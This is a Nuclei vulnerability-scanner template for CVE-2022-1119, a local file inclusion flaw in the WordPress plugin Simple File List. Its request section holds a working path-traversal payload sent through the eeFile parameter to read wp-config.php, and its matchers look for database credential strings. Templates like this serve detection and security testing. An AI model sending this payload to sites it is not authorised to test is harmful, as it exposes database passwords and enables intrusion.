nuclei-templates/cves/2022/CVE-2022-1119.yaml

41 lines
1.3 KiB
YAML

id: CVE-2022-1119
info:
name: WordPress Simple File List <3.2.8 - Local File Inclusion
author: random-robbie
severity: high
description: |
WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
reference:
- https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
- https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606
- https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880
- https://nvd.nist.gov/vuln/detail/CVE-2022-1119
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1119
cwe-id: CWE-22
tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/06/29